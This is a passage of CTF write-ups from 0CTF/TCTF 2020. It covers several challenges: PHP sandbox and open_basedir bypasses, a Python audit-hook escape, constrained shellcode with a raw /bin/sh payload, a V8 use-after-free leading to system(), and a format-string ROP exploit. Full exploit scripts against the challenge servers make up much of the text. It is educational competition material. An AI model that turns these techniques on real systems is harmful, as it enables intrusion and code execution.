    ideaDecryptBlock(&ctx, (uint8_t*)enc+0x08, fl0g+0x08);
    ideaDecryptBlock(&ctx, (uint8_t*)enc+0x10, fl0g+0x10);
    ideaDecryptBlock(&ctx, (uint8_t*)enc+0x18, fl0g+0x18);
    printf("----\n");
    for (size_t i = 0; i < 0x20; ++i) {
        printf("%hhx", fl0g[i]);
    }
    printf("\n----\n");
    puts(fl0g);
}

$ gcc idea.c pwn.c
$ ./a.out         
ef28dd7f 5078615a
955a0f80 15682e55
538f435e e71bceee
5675a3e5 7bf39dad
----
666c61677b336e6a30795f793075325f523341315f6a63635f306333346e217d
----
flag{3nj0y_y0u2_R3A1_jcc_0c34n!}

Cloud Computing

sandr0 | misc, 42 solves, 211 points

We are greeted with the challenge source.

<?php

error_reporting(0);

include 'function.php';

$dir = 'sandbox/' . sha1($_SERVER['REMOTE_ADDR'] . $_SERVER['HTTP_USER_AGENT']) . '/';

if(!file_exists($dir)){
  mkdir($dir);
}

switch ($_GET["action"] ?? "") {
  case 'pwd':
    echo $dir;
    break;
  case 'upload':
    $data = $_GET["data"] ?? "";
    if (waf($data)) {
      die('waf sucks...');
    }
    file_put_contents("$dir" . "index.php", $data);
  case 'shell':
    initShellEnv($dir);
    include $dir . "index.php";
    break;
  default:
    highlight_file(__FILE__);
    break;
}

We get a sandbox, and 3 actions: pwd, upload and shell.

The code we upload gets checked through the unknown function “waf” and is then saved into “index.php” in our sandbox which gets included and therefore executed.

We are able to achieve PHP-Code execution with this.

<?%0aprint(getcwd());?> leads to /var/www/html. It seems, waf() is a simple character check stripping away a few special characters and uppercase letters and restricting the length of our code.

With <?%0aeval(getallheaders()[x]); we are able to access the header and evaluate code sent in our header, which is not restricted by waf().

First let’s enable error_reporting(E_ALL); and then try to access different files on the server.

Sending the payload error_reporting(E_ALL);file_get_contents("function.php"); we get a warning telling us that an additional “open_basedir” is in effect.

Using the open_basedir bypass described here, we were able to bypass it and are now able to read every file on the filesystem.

/var/www/html/functions.php:

<?php

function waf($data='')
{
  if (strlen($data) > 35) {
    return true;
  }
  if (preg_match("/[!#%&'*+,-.: \t@^_`|A-Z]/m", $data, $match) >= 1) {
    return true;
  }
  return false;
}

function initShellEnv($dir)
{
  ini_set("open_basedir", "/var/www/html/$dir");
}

While trying to access /flag we get a gzipped file, which contains a filesystem that shows nothing when mounted. A quick check with binwalk shows there is a PNG hidden inside of it which displays the flag: flag{do_u_like_cloud_computing}

exploit.py:

import secrets
import requests

user_agent = secrets.token_hex()
r = requests.get("http://pwnable.org:47780/?action=pwd",
    headers={
        "User-Agent": user_agent
    }
)
sandbox = r.text

r = requests.get("http://pwnable.org:47780/?action=upload&data=<?%0aeval(getallheaders()[x]);",
    headers={
        "User-Agent": user_agent,
        "x": f'error_reporting(E_ALL);mkdir("/var/www/html/{sandbox}lol");chdir("/var/www/html/{sandbox}lol");ini_set("open_basedir", "..");chdir("..");chdir("..");chdir("..");chdir("..");chdir("..");ini_set("open_basedir","/");print(file_get_contents("/flag"));'
    }
)
flag_file = r.content

PyAuCalc

mckirk/sandr0 | misc, 17 solves, 407 points

We were greeted with a Python-like console. First we extract the source with command source and the CPython audit sandbox binary with sandbox.

Our Python code is first checked for whitespaces and subsequently evaluated without builtins:

if not (expression := re.sub(r'\s', '', expression)):
    signal.alarm(0)
    continue

eval(expression, {'__builtins__': {}})

Recovering builtins

We can regain the stripped builtins with:

().__class__.__base__.__subclasses__()[183]()._module.__builtins__

().__class__.__base__ gives access to <class 'object'>. From there on we get all subclasses which are currently loaded in the Python instance.

In them, there is <class 'warnings.catch_warnings'> at location 183. From there, we can access the builtins with catch_warnings()._module.__builtins__. Now we are able to execute almost arbitrary code, only protected by the audit sandbox which restricts events which contain one of the following strings:

breakpoint, ctypes, fcntl, ftplib, glob, imaplib, import, mmap, msvcrt, nntplib, open, os, pdb, poplib, pty, resource, shutil, smtplib, socket, sqlite3, subprocess, syslog, telnetlib, tempfile, urllib, webbrowser, winreg

which basically restricts us from executing commands on the shell or reading files.

The only possible events left are:

array.__new__, builtins.input, builtins.input/result, code.__new__, compile, cpython.PyInterpreterState_Clear, cpython.PyInterpreterState_New, cpython._PySys_ClearAuditHooks, cpython.run_command, cpython.run_file, cpython.run_interactivehook, cpython.run_module, cpython.run_startup, cpython.run_stdin, ensurepip.bootstrap, exec, pickle.find_class, signal.pthread_kill, sys._current_frames, sys._getframe, sys.addaudithook, sys.excepthook, sys.set_asyncgen_hooks_finalizer, sys.set_asyncgen_hooks_firstiter, sys.setprofile, sys.settrace, sys.unraisablehook

Since we can still use exec we are able to execute Python code or bytecode.

We were able to gain some information:

().__class__.__base__.__subclasses__()[183]()._module.__builtins__["exec"]('builtins=().__class__.__base__.__subclasses__()[183]()._module.__builtins__;print=builtins["print"];sys=builtins["__import__"]("sys");print(sys.version);')

 3.8.3 (default, Jun  9 2020, 17:39:39) 
[GCC 8.3.0]

Escaping the sandbox

However, the audit-sandbox still prevented us from interacting with the machine in any meaningful way, and we could not figure out how to read the flag without further shenanigans. It was therefore time to have a look at the CPython source code, to figure out how the audit-hook was implemented exactly.

After scanning through the code, it became evident that the function responsible for blocking all our escape-attempts was PySys_Audit, and it looked like there was no way to prevent the once-installed AuditHookEntry from being executed.

Well, there was almost no way: There was the conveniently named function PySys_ClearAuditHooks – which was inconveniently inaccesible directly from Python.

But after looking at how that function was used, an idea began to form: Clearing the audit hooks is not the last operation in the shutdown-sequence of the interpreter. Instead, it is directly followed by a call to PyImport_Cleanup, helpfully annotated with the comment “Destroy all modules”…

So you’re saying module destructors are called after the audit hooks have been cleared?

( ͡° ͜ʖ ͡°)

builtins = "().__class__.__base__.__subclasses__()[183]()._module.__builtins__"

code = f"""
b = {builtins}
sys = b["__import__"]("sys")
os = b["__import__"]("os")

class evil_del:
    def __del__(self):
        os.system("/readflag")

sys.modules["derp"] = evil_del()
exit()
"""

hexed = "".join([f"\\x{ord(b):02x}" for b in code])
wrapped = f'{builtins}["exec"]("{hexed}")'

print(wrapped)

flag{bytecode_exploit_to_pwn_python_and_bypass_audit_hook_36c3879ea297210820301ce1}

eeemoji

sisu | misc, 40 solves, 220 points

We are presented with a shellcoding challenge where we can provide a payload and part of it gets overwritten. The beginning and the last two bytes of the payload remaing intact. This allows one to control the first two bytes of the executed code, after which the program’s code prints some data and executes RET. At the point of executing the two bytes, the R11 register contains the address of the mapped executable page. The first 0x100 bytes of that page contain the beginning of our payload. Gaining execution can be done via: push r11 = 41 53. After RET is performed, our payload gets immediately executed.

The only limitation is that the payload has to be in the unicode format: 00-00 00-0F 00-FF 00-FF. The idea behind my solution is to use a one gadget in libc to open a shell. Since, an address to __libc_start_main is on the stack, the payload could pop sufficiently many times, recompute the offset and jump to the address. Due to the limitation caused by the payload constraints, this solution has to guess the nibble after the page offset.

Short version of the payload:

## Multiple of these to position the stack until __libc_start_main

pop rax           = 58
rex.WB or al,0x0  = 49 0c 00

## Now RAX contains the address of __libc_start_main + some offset.
   We want to reposition the address to the one gadget and jump into it:

add rax,0xe0000 = 48 05 00 00 0e 00
add al, 0x0     = 04 00             ; padding
mov ah, 0xe3    = b4 e3
add al, 0x0     = 04 00             ; padding
mov al, 0x8c    = b0 8c
add al, 0x0     = 04 00             ; padding
jmp rax         = ff e0
...             = 00 00             ; padding

Code:

from pwn import *

io = remote("pwnable.org", 31322)

# Create mapping
io.send("\U0001f37a" * 3)

# Send payload
io.send("\U0001f434" * 3)
io.send("\U000c4958" * 9 + "\U00000548" + "\U0004000e" + "\U0004e3b4" + "\U00048cb0" + "\U0000e0ff" + "\U00010000" * (0x81 - 10 - 5) + "\U00015341" + "\n")

io.interactive()

The script doesn’t consider that guessing the one gadget address can fail and requires manual work to restart it.

The flag is: flag{zer0_address_is_so0o0o0o_dangerous}

eeeeeemoji

sisu | pwn, 12 solves, 500 points

We are presented with a shellcoding challenge where the payload, environment and time are constrained. Three options are presented in each round:

mmap a random page between [0, 0x1000000] (valid range begins at 0x10000 due to mmap_min_addr).
read payload with fgetws and print it in a very limited constrained environment: registers are scrubbed, a corrupted stack frame of 0x8000 is allocated, validation is performed when restoring the context. Only RDX, RIP, RSP have something pointing to a valid address.
not so useful

Option 1 allows one to fill the [0x10000, 0x1000000] region with pages and 2 allows one to fill them with our payload. Option 2 has a bug where we can execute a 2-byte-long instruction before the print happens.

The first idea of my solution is to corrupt the stack pointer by executing and esp, edx = 21 d4. Due to the ESP having mostly all bits set after the page offset, we are very likely to get an address which points to the current page where the payload is. This would also zero-out all bits after the 32-th bit. However, 0x8000 is later added to the stack pointer and there is validation of it.

The second idea is to use option 1 to populate the address space until we find that a mapping already exists 0x8000 bytes ahead of the current one. For each mapping before the last one, we send a payload with the register values we want to be popped, the saved stack pointer and useful payload. Once the registers are popped, RET is executed and we gain execution. The two bytes executed in those mappings are two nops to avoid crashes.

However, the payload is limited to be in the Unicode format [00-00] [00-0F] [00-FF] [00-FF]. The solution is to filter the pages in the first idea to only be of suitable addresses which match the unicode pattern. Then we can always point the popped registers to addresses which are mapped. We also only need to be able to execute the read syscall and provide the actual payload to open a shell.

The initial payload is thus:

xor eax, eax           = 31 c0
add al, 0x0            = 04 00  ; padding
syscall                = 0f 05
add al, 0x0            = 04 00  ; padding
jmp -106               = eb 90
.data 00 00            = 00 00  ; padding

The payload would allow me to read any bytes into the current buffer and then immediately jump backwards to execute it. The second payload I send is a standard shell payload copied from exploit-db.

During the development phase I found it useful to edit the provided binary to only focus on corrupting the stack and the constrained shellcoding. The mmap address was made fixed and the addition of 0x8000 bytes was removed. This made experimentation easy.

The set alarm made it difficult to brute-force remotely since I could get around one mmap per second.

Code:

from pwn import *
import codecs

def prep_payload(attack, hh):
    # hh =e0 
    #time.sleep(1)
    io.readuntil(u"Miaow miaow miaow")
    io.send("\U0001f434" * 3)
    payload = ""
    payload += "\U00000001" * 16 # r15-r8
    payload += "\U00000002" * 2 # rbp
    value = '\\U' + str("000" + hh + "000")
    value = codecs.decode(value, "unicode_escape")
    payload +=  value +  "\U00000000" # rsi, address to read at
    payload += "\U00000000" + "\U00000000" # rdi, fd = stdin
    payload += "\U00000200" + "\U00000000" # rdx, length
    payload += "\U00014090" + "\U00000000" # rcx
    payload += "\U00015090" + "\U00000000" # rbx
    payload += "\U0000003b" + "\U00000000" # rax
    payload += "\U00000000"*2  # eflags
    value = '\\U' + str("000" + hh + "088")
    value = codecs.decode(value, "unicode_escape")
    payload += value  + "\U00000000" # rsp
    value = '\\U' + str("000" + hh + "090")
    value = codecs.decode(value, "unicode_escape")
    payload += value + "\U00000000" 

    # zero rax, syscall, relative jump
    payload += "\U0004c031" + "\U0004050f" + "\U000090eb"

    if (attack == True):
        # corrupt stack
        payload += "\U0000d421" * (0x82 - 18 * 2 - 1 - (3))
    else:
        # send nops
        payload += "\U00009090" * (0x82 - 18 * 2 - 1 - (3))
    #time.sleep(1)
    io.send(payload)

attack_cnt = 0
attempts = 0
while True:
    io = remote("pwnable.org", 31323)

    print(str(attempts) + " " + str(attack_cnt))

    attempts += 1
    addresses = []

    # Try to find two allocations which are 0x8000 apart.
    try:
        while True:
            #time.sleep(1)
            io.readuntil(u"Miaow miaow miaow")
            io.send("\U0001f37a" * 3)
            io.readuntil("mmap() at @")
            addr = int(io.readuntil("\n")[:-1], 16)
            # we want it to be of the format 0xYY000
            if ((addr >> 12) <= 0xff):
                addresses.append(addr)
                special = (addr >> 12) & 0xFF
                print(f"Ok: {hex(addr)}, special: {hex(special)}")
                if (addr + 0x8000) in addresses:
                    prep_payload(True, hex(addr >> 12)[2:])
                    print("Attack")
                    attack_cnt += 1
                    break
                else:
                    prep_payload(False, hex(addr >> 12)[2:])
    except:
        continue

    io.readuntil(b"\x00\x00\x00\x01"*8)
    io.send(0x2a * b"\x00" + b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05") # send /bin/sh payload
    try:
        io.send("ls\n")
        io.send("cat flag\n")
    except:
        continue

    io.interactive()

Unfortunately, the script requires manual restart by clicking enter but few attempts are necessary.

Flag is: flag{thanks_Plaid_CTF_we_found_th1s}

Chromium RCE

hlt | pwn, 29 solves, 282 points

For this task, we are given a modified copy of d8 (the command line JavaScript intepreter for the V8 engine).

The applied patch is fairly straightforward: Native syntax (that allows interfacing with V8 internals) is disabled except for %ArrayBufferDetach(...) and globals and imports are removed. The interesting part are the changes to typed-array-set.tq, which remove an important check in TypedArray.prototype.set:

Each JavaScript TypedArray is backed by an ArrayBuffer. If you create a TypedArray (such as Uint8Array) directly, such a buffer object is implicitly created for you. This ArrayBuffer can become detached (i.e. it is no longer backed by memory, and has an implicit byte length of zero). Normally, it is prohibited to use .set to copy into or from a TypedArray with a detached buffer (throwing a TypeError in the process as specified here), but this check is removed by the patch.

This gives us a straightforward use-after-free on the ArrayBuffer (and the %ArrayBufferDetach primitive allows us to forcibly free any targeted ArrayBuffer).

Note that V8 (or at least d8) allocates the JavaScript objects on their own heap (i.e. the JSArrayBuffer and JSTypedArray objects), but the underlying buffers are still allocated normally using malloc and calloc.

When we create an ArrayBuffer, we can observe four separate allocations on the normal libc heap (e.g. with traceheap via LD_PRELOAD):

calloc(<size>, 1) for the underlying data buffer
malloc(48) for the v8::internal::BackingStore that takes care of deallocation
malloc(32) for the control block of the std::shared_ptr that contains the BackingStore
malloc(40) for the ArrayBufferExtension that is used internally to track heap objects.

When we detach an array buffer, the first three of these objects are freed (I believe that the extension block is freed whenever garbage collection runs, but did not verify this).

At first, I thought that it may be necessary to overwrite the data pointer in the BackingStore to obtain arbitrary write access via a manipulated ArrayBuffer, but it turns out that this is both unnecessary and impossible — the JSArrayBuffer does not actually reference the BackingStore object! Instead, its backing_store_ member is just a pointer to the actual data buffer (despite the name). However, the v8::internal::BackingStore class allows for a number of different allocators, and has support for storing a function pointer to a deallocation routine. If we can overwrite this function pointer, we can call any function with the data in the ArrayBuffer as its first argument.

This turns the challenge into a relatively straightforward heap exploit on glibc 2.27:

First, we create a 48 byte ArrayBuffer (with an associated TypedArray) and detach the buffer. This places two 48-byte blocks in the proper tcache bin, the first of which is still accessible to us through the TypedArray thanks to the patches.
We discard the first of these blocks by allocating another ArrayBuffer (the storage used for the BackingStore of the first buffer is reused here). A third (large) ArrayBuffer is allocated — and the allocation of its BackingStore will overlap the UaF created by detaching the first buffer.

// Create 48-byte buffer that we later overlap with a BackingStore
const backingStore = new ArrayBuffer(48);
const backingStore_u8 = new Uint8Array(backingStore);
%ArrayBufferDetach(backingStore);

// Pad allocations so that we align the following allocation nicely.
const discard = new ArrayBuffer(32);

// Allocate an ArrayBuffer whose BackingStore overlaps the 48-byte
// data buffer of the backingStore (by tcache logic)
const overlapping = new ArrayBuffer(0x1000);
const overlapping_u8 = new Uint8Array(overlapping);

Since we can’t just read from the TypedArray (the checks for detached buffers are only disabled for the set method), we need to create an additional TypedArray that we can use to copy data from detached buffers. Here’s how the BackingStore looks like internally:

function hex64(v) { return '0x' + v.toString(16).padStart(16, '0'); }
function hex8(v) { return '0x' + v.toString(16).padStart(2, '0'); }

const reader = new ArrayBuffer(0x1000);
const u8 = new Uint8Array(reader);
const u64 = new BigUint64Array(reader);

u8.set(backingStore_u8);
console.log('backingStore array / BackingStore of overlapping array');
console.log('\t 0  buffer_start_       =', hex64(u64[0]));
console.log('\t 8  byte_length_        =', hex64(u64[1]));
console.log('\t16  byte_capacity_      =', hex64(u64[2]));
console.log('\t24  type_specific_data_ =', hex64(u64[3]));
console.log('\t32                       ', hex64(u64[4]));
console.log('\t40  [flags]             =', hex64(u64[5]));

To leak a libc address, we do the usual trick of creating a read-after-free on a largebin chunk, which will give us a pointer to somewhere near the main_arena in the libc.

// Allocate large-bin chunks so that we find the libc that way.
const large_1 = new ArrayBuffer(0x440);
const large_2 = new ArrayBuffer(0x440);
const large_1_u8 = new Uint8Array(large_1);
const large_2_u8 = new Uint8Array(large_2);
%ArrayBufferDetach(large_1);
%ArrayBufferDetach(large_2);
u8.set(large_2_u8);
let libc_main_arena_ptr = u64[1];

// Ubuntu 18.04 glibc 2.27
LIBC_MAIN_ARENA_PTR_OFFSET = BigInt(0x3ebca0)
LIBC_SYSTEM_OFFSET = BigInt(0x4f440)

let libc_start = libc_main_arena_ptr - BigInt(LIBC_MAIN_ARENA_PTR_OFFSET);
let libc_system = libc_start + BigInt(LIBC_SYSTEM_OFFSET);

For command execution, we overwrite the type_specific_data_ member of the v8::internal::BackingStore with the address of system and set the appropriate flags. If the custom_deleter_ flag is set in the BackingStore, the type_specific_data_ member is interpreted as a v8::internal::BackingStore::DeleterInfo, which consists of a function pointer (callback) and an additional data pointer (data).
When the BackingStore is destroyed, the deleter callback will be invoked as callback(buffer_start_, buffer_size_, data). Of course, we control the contents of buffer_start_ (it is just the contents of the ArrayBuffer associated with that BackingStore), and so we just need to destroy the BackingStore to call system("/readflag").
Of course, the BackingStore is destroyed as soon as we detach the buffer that uses it, which gives us a really convenient way to trigger RCE.
```
const COMMAND = '/readflag';

const backingStoreWriter = new ArrayBuffer(48);
const backingStoreWriter_u8 = new Uint8Array(backingStoreWriter);
const backingStoreWriter_u64 = new BigUint64Array(backingStoreWriter);
backingStoreWriter_u8.set(backingStore_u8);
backingStoreWriter_u64[3] = libc_system;
backingStoreWriter_u64[5] |= BigInt(0x40); // Set the flag for the destructor.
backingStore_u8.set(backingStoreWriter_u8);

overlapping_u8.set(Uint8Array.from(COMMAND.split('').map(c => c.charCodeAt(0))));

%ArrayBufferDetach(overlapping); // Forcibly free the BackingStore.
```

Here is the full exploit:

// We can use detached ArrayBuffers in TypedArray.prototype.set (both for
// reading and for writing), and we can forcibly detach an array buffer using
// %DetachArrayBuffer (this calls ->Detach(false) on the underlying
// JSArrayBuffer object).
// Global symbols and imports are removed.

function hex64(v) { return '0x' + v.toString(16).padStart(16, '0'); }
function hex8(v) { return '0x' + v.toString(16).padStart(2, '0'); }

// Ubuntu 18.04 glibc 2.27
LIBC_MAIN_ARENA_PTR_OFFSET = BigInt(0x3ebca0)
LIBC_SYSTEM_OFFSET = BigInt(0x4f440)

COMMAND = '/readflag'

// Make a 48-byte allocation to overlap the extension in which the BackingStore is registered
// Each array buffer allocation performs the following allocations:
//    calloc(<size>, 1);
//    malloc(48); // for the v8::internal::BackingStore
//    malloc(32); // for the control block of the std::shared_ptr containing the backing store
//    malloc(40); // for the ArrayBufferExtension (enabled by default in the build we have)

// Create 48-byte buffer that we later overlap with a BackingStore
const backingStore = new ArrayBuffer(48);
const backingStore_u8 = new Uint8Array(backingStore);
%ArrayBufferDetach(backingStore);

// Pad allocations so that we align the following allocation nicely.
const discard = new ArrayBuffer(32);

// Allocate an ArrayBuffer whose BackingStore overlaps the 48-byte data buffer of the backingStore (by tcache logic)
const overlapping = new ArrayBuffer(0x1000);
const overlapping_u8 = new Uint8Array(overlapping);

// Clone the BackingStore into a new array
const reader = new ArrayBuffer(0x1000);
const u8 = new Uint8Array(reader);
const u64 = new BigUint64Array(reader);

u8.set(backingStore_u8);
console.log('backingStore array / BackingStore of overlapping array');
console.log('\t 0  buffer_start_       =', hex64(u64[0]));
console.log('\t 8  byte_length_        =', hex64(u64[1]));
console.log('\t16  byte_capacity_      =', hex64(u64[2]));
console.log('\t24  type_specific_data_ =', hex64(u64[3]));
console.log('\t32                       ', hex64(u64[4]));
console.log('\t40  [flags]             =', hex64(u64[5]));

// If (flags & 0x40), type_specific_data_ is a pair of a function pointer and
// destructor data; the function pointer is invoked on destruction as
// fn(buffer_start_, byte_length_, data).
// Allocate large-bin chunks so that we find the libc that way.
const large_1 = new ArrayBuffer(0x440);
const large_2 = new ArrayBuffer(0x440);
const large_1_u8 = new Uint8Array(large_1);
const large_2_u8 = new Uint8Array(large_2);
%ArrayBufferDetach(large_1);
%ArrayBufferDetach(large_2);
u8.set(large_2_u8);
let libc_main_arena_ptr = u64[1];
let libc_start = libc_main_arena_ptr - BigInt(LIBC_MAIN_ARENA_PTR_OFFSET);
let libc_system = libc_start + BigInt(LIBC_SYSTEM_OFFSET);

console.log('Leaked pointer to (near) main_arena:', hex64(libc_main_arena_ptr));
console.log('Calculated location of libc.so.6:   ', hex64(libc_start));
console.log('Calculated location of system():    ', hex64(libc_system));

// The array we copy from must not be larger than the array we copy into, and
// set has no way to restrict the range we copy from.
const backingStoreWriter = new ArrayBuffer(48);
const backingStoreWriter_u8 = new Uint8Array(backingStoreWriter);
const backingStoreWriter_u64 = new BigUint64Array(backingStoreWriter);
backingStoreWriter_u8.set(backingStore_u8);
backingStoreWriter_u64[3] = libc_system;
backingStoreWriter_u64[5] |= BigInt(0x40); // Set the flag for the destructor.
backingStore_u8.set(backingStoreWriter_u8);

overlapping_u8.set(Uint8Array.from(COMMAND.split('').map(c => c.charCodeAt(0))));

%ArrayBufferDetach(overlapping); // Forcibly free the BackingStore.

and an example output

_______________                             _____                            ________ ___________________
__  ____/___  /_ ______________ _______ ___ ___(_)____  _________ ___        ___  __ \__  ____/___  ____/
_  /     __  __ \__  ___/_  __ \__  __ `__ \__  / _  / / /__  __ `__ \       __  /_/ /_  /     __  __/   
/ /___   _  / / /_  /    / /_/ /_  / / / / /_  /  / /_/ / _  / / / / /       _  _, _/ / /___   _  /___   
\____/   /_/ /_/ /_/     \____/ /_/ /_/ /_/ /_/   \__,_/  /_/ /_/ /_/        /_/ |_|  \____/   /_____/   

Welcome to 0CTF/TCTF 2020!
Paste your javascript code here, end it with EOF(not Ctrl-D :P). Then I will run `d8 <xxx.js>`.
flag{dbc68439ba5f2cdbccf459cd3edb54c80b9c89e9}
backingStore array / BackingStore of overlapping array
	 0  buffer_start_       = 0x00005624615f8ad0
	 8  byte_length_        = 0x0000000000001000
	16  byte_capacity_      = 0x0000000000001000
	24  type_specific_data_ = 0x00007ffdd2bfe780
	32                        0x0000000000000000
	40  [flags]             = 0x0000000000000008
Leaked pointer to (near) main_arena: 0x00007fdc28d77ca0
Calculated location of libc.so.6:    0x00007fdc2898c000
Calculated location of system():     0x00007fdc289db440

simple echoserver

iead | rev, 29 solves, 289 points

This is a fairly simple-looking task that first requests your name and your phone number. Then it reads input line by line and echoes it back.

Vulnerability

Looking at the binary, you will quickly identify the vulnerability. After reading your name, before starting the read-echo loop, name and phone number are written to stderr in a very interesting manner.

void print_audit(struct player*){
	snprintf(buf, 0x100, "[USER] name: %s;phone: %lld\n", player->name, player->phone);
	fprintf(stderr, buf);
}

While the first invocation of printf writes a user-supplied string into the buffer via %s, the second does not. And since we control the contents of player->name we subsequently control buf. Here we can inject format string specifiers. The main difficulty comes from using global variables to hold the player name and the buffer. As only input from reading the phone number lies on the stack, we cannot inject pointer arguments.

Stage 1 — closing the loop

To make life easier I modified the binary in two ways. First I removed the annoying sleep(1) from the initialization and secondly I patched the fprintf to print to stdout instead of stderr. The latter modification allowed me to apply my tooling to automatically find pointer chains on the stack. From the libc version bundled with the task, I guessed the environment to be an Ubuntu bionic. Thus I created a docker image deploying the task and verified my assumption. In addition to applying my tool, I dumped the stack at the time of the second printf to get a more complete picture:

0x7ffc5eda6760:	0x0000000000000000      		0x000055d889b5a160 <fmt>
0x7ffc5eda6770:	0x00007ffc5eda6890 <1b>   		0x000055d889b57443 <ret>
0x7ffc5eda6780:	0x0000000000000000      		0x0000000000000000
0x7ffc5eda6790:	0x00007ffc5eda6890 <2b>  		0x00007fcb70e0ca00
0x7ffc5eda67a0:	0x0000000000000d68      		0x00007fcb70aae148
0x7ffc5eda67b0:	0x000000007005ca00      		0xffffffffffffffff
0x7ffc5eda67c0:	0x000055d889b570f0      		0x000000000000000a
0x7ffc5eda67d0:	0x00007ffc5eda6870 <3b> 		0x000055d889b570f0
0x7ffc5eda67e0:	0x00007ffc5eda6990      		0x0000000000000000
0x7ffc5eda67f0:	0x0000000000000000      		0x000055d889b57348
0x7ffc5eda6800:	0x00007fcb70e0ca00 <libc>  		0x00007ffc5eda6814
0x7ffc5eda6810:	0x0000000034333231      		0x00007ffc5eda6990
0x7ffc5eda6820:	0x0000000000000000      		0x00007fcb70aaf3f2
0x7ffc5eda6830:	0x0000000000000036      		0x000055d889b5a166
0x7ffc5eda6840:	0x00007ffc5eda6870 <5b>            	0x000055d889b5728d
0x7ffc5eda6850:	0x0000010089b58029      		0x6fb335d337bed900
0x7ffc5eda6860:	0x0000000000000000      		0x0000000000000000
0x7ffc5eda6870:	0x00007ffc5eda6890 <5t>     		0x000055d889b573b3
0x7ffc5eda6880:	0x00007ffc5eda6990      		0x6fb335d337bed900
0x7ffc5eda6890:	0x00007ffc5eda68b0 <1t,2t,3b>		0x000055d889b574d0 <ret to main>
0x7ffc5eda68a0:	0x00007ffc5eda6990      		0x0000000000000000
0x7ffc5eda68b0:	0x000055d889b574e0 <3t>		0x00007fcb70a42b97 <ret to libc>

The pointer chains my tool recovered were [(7, 43), (11, 43), (19, 39), (33, 39), (39, 43), (43, 47), (50, 76)]. I marked these chains in the stack dump. I could have done this by hand as well, but this tool also recovers the indexes as used by printf which otherwise would be a tedious task. Immediately the chain 3b -> 3t came to my attention, as it points into the executable’s image. The pointer to stderr and stdout are stored in the writeable data segment on the very next page of memory. A plan quickly formed in my head. The goal was to overwrite the stderr pointer to point to stdout and also overwrite the return address, returning into main(), to call reading the name and doing the format-string attack again. For getting the loop, three chains caught my attention. Chains 1, 2 and 5 both looked promising. Unfortunately using chains 1 or 2 would entail breaking chain 3, which I relied on. Thus I used chain 5. It was possible to fix the return address with a one byte partial overwrite the change the pointer on the stack, as well as one to overwrite the return address. Because of stack randomization this requires 4 bits of brute force. For changing stderr to stdout two overwrites with two bytes each were required, adding 4 bits of brute force each. Thus the exploit already has a success probability of only 1 in 2¹². This is good enough but there is not much room for more.

Stage 2 — popping a shell

I canceled the echoing part using "~." and with a bit of luck was greeted with the name prompt again. With a little more luck, I received the output of fprintf. To my delight, I could confirm that the pointer chains were still intact in the second round. After some consideration I decided to first leak the libc address and then write a small ROP chain instead of the return from main(). This time I could use chain 1 as I did not need to overwrite anything in the program image any more. Writing two bytes at a time I created the standard pop rdi; "/bin/sh\0"; system ROP chain. Running this exploit against remote I got a little lucky and only had to wait ~30 seconds.

easyphp

0xbb | web, 59 solves, 175 points

We are presented with a minimal PHP sandbox challenge:

<?php
if (isset($_GET['rh'])) {
    eval($_GET['rh']);
} else {
    show_source(__FILE__);
}

The following functions are disabled: set_time_limit,ini_set,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,mail,putenv,error_log,dl …and open_basedir is set to /var/www/html.

This PHP bug can be used to get a file listing of /:

foreach(new DirectoryIterator('glob:///*') as $f){
	echo $f."\n";
}

Output:

bin
dev
etc
flag.h
flag.so
home
lib
media
mnt
opt
proc
root
run
sbin
srv
start.sh
sys
tmp
usr
var

The files flag.h and flag.so and an enabled FFI extension hint towards trying to call something.

We can’t directly read flag.h because of the open_basedir, but we can load it:

$ffi = FFI::load('/flag.h');

But we are still lacking the name of the function that we should call to get the flag.

Dramaturgical break

At this point someone else likely pwned the challenge via the open fpm socket and disabled the open_basedir restriction for future requests.

We could thus simply read /flag.h and call flag_fUn3t1on_fFi().

(According to https://ctftime.org/writeup/21979, it seems that we were not the only one to use this problem.)

Full Exploit:

#!/usr/bin/env python3
import requests

payload = '''
error_reporting(E_ALL);
ini_set('error_reporting', E_ALL);
ini_set('display_errors', '1');

foreach(new DirectoryIterator('glob:///*') as $f){
	echo $f."\n";
}

$ffi = FFI::load('/flag.h');
$a = $ffi->flag_fUn3t1on_fFi();

var_dump(FFI::string($a));
'''
host = 'pwnable.org'
r = requests.get(f'http://{host}:19260/', params={'rh': payload})
print(r.text, r.status_code)

Flag: flag{FFi_1s_qu1T3_DANg1ouS}

noeasyphp

0xbb | web, 18 solves, 392 points

We are again presented with a minimal PHP sandbox challenge:

<?php
if (isset($_GET['rh'])) {
    eval($_GET['rh']);
} else {
    show_source(__FILE__);
}

The challenge was very similar to the easyphp challenge, but this time PHP was running within Apache + mod_php.

We again need to call a secret function to get the flag from /flag.so.

From inspecting php-src we know that /flag.h gets fully read into memory when being loaded, so we decided to leak this information via the FFI extension.

#!/usr/bin/env python3
import requests

flag after a leak
payload = '''
error_reporting(E_ALL);
ini_set('error_reporting', E_ALL);
ini_set('display_errors', '1');

for($i=0;$i<1000;$i++){
    $f = FFI::load ('/flag.h');
}

$a = FFI::new ('uint8_t[256]', true, false);
$a = FFI::cast ('uint8_t *', $a);

$n = 1024*512;
for($i=0;$i<$n+(1024*1024);$i++){
    echo chr($a[(-$n)+$i]);;
}
'''
host = 'pwnable.org'
r  = requests.get(f'http://{host}:19261/', params={
    'rh': payload
})

print(r.text, r.status_code)

After playing with the parameters (especially the allocation settings of $a) we were able to reliable leak the the function name from memory:

$. /leak.py | strings |grep flag

; Boolean flags can be turned on using the values 1, On, True or Yes.
; unix or win32 systems, setting this flag will cause PHP to
; http://php.net/filter.default-flags
;filter.default_flags =
; SQLite defensive mode flag (only available from SQLite 3.26+)
; When the defensive flag is enabled, language features that allow ordinary
; (for older SQLite versions, this flag has no use)
; Whether or not to add the httpOnly flag to the cookie, which makes it
ffi.preload=/flag.h
flag_wAt3_uP_apA3H1
